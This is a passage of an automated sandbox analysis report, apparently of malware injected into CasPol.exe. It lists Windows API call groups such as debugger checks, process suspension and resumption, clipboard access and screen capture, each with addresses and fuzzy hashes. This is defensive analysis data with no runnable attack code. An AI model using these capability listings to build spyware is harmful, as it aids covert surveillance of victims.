  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: p'E$JD
• API String ID: 1084509184-908320845
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
• UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
• TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
• ExitProcess.KERNEL32 ref: 0044338F
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
• TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
• ExitProcess.KERNEL32 ref: 10004AEE
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2058664381-0
                                                                                                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3614150671-0
                                                                                                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                          • Instruction ID: dbaabbb0ea2570487ff62d8cf89bd30b477e7113d13ca21b8680662729a76e86
                                                                                                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 66D05E36204121E3C320176A7C0CD97AD68DBC5AA2705412AF804C26649A60CC0186E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1999457699-0
                                                                                                                                                                          • Opcode ID: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                                                                                                                                          • Instruction ID: 1e4755145751be78863ec26184204985b99a3e1fec7ed1e2fa2d7a7f5aac3163
                                                                                                                                                                          • Opcode Fuzzy Hash: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 73D05E36104121E3C6211B6A7C0CD97AD68DFC5AA2705412AF904D26509A20CC0186E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                          • API String ID: 2325560087-2978689999
                                                                                                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .
                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .
                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                          • String ID: JD
                                                                                                                                                                          • API String ID: 1084509184-2669065882
                                                                                                                                                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
• Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
• Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
• Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 1661935332-0
• Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
• Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
• Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
• Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
• Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
• Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
• Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
• Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
APIs
  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
• EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
• Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
• Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
• Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
• Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,@ev,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
• Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
• Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
• Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• DeleteDC.GDI32(00000000), ref: 00418F65
• DeleteDC.GDI32(00000000), ref: 00418F68
• DeleteObject.GDI32(00000000), ref: 00418F6B
• SelectObject.GDI32(00000000,00000000), ref: 00418F8C
• DeleteDC.GDI32(00000000), ref: 00418F9D
• DeleteDC.GDI32(00000000), ref: 00418FA0
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetCursorInfo.USER32(?), ref: 00418FE2
• GetIconInfo.USER32 ref: 00418FF8
• DeleteObject.GDI32(?), ref: 00419027
• DeleteObject.GDI32(?), ref: 00419034
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
• GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
• LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                          • String ID: DISPLAY
                                                                                                                                                                          • API String ID: 4256916514-865373369
                                                                                                                                                                          • Opcode ID: 5ab43138adcd575be0dbcb62ac3445f04d4a9c6ac3cd026803d6245b460d00cf
                                                                                                                                                                          • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab43138adcd575be0dbcb62ac3445f04d4a9c6ac3cd026803d6245b460d00cf
